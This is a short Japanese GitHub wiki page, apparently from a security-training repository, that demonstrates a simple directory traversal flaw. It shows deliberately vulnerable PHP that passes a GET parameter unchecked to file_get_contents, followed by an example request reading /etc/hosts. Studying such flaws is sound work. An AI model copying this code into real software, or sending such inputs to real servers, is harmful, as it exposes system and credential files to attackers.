ディレクトリトラバーサル 01 - yujitounai/helloworld GitHub Wiki

ディレクトリトラバーサル-01

単純なディレクトリトラバーサル

脆弱なソースコード (PHP)

<div class="box">
	<form method="get" action="">src
		<input name="src" type="text">
		<input type="submit">
	</form>
</div>
<?php
$src = filter_input(INPUT_GET,"src");
if($src)$output = file_get_contents($src);
echo $output;
?>

攻撃方法

directorytraversal-01.php?src=/etc/hosts

⚠️ **GitHub.com Fallback** ⚠️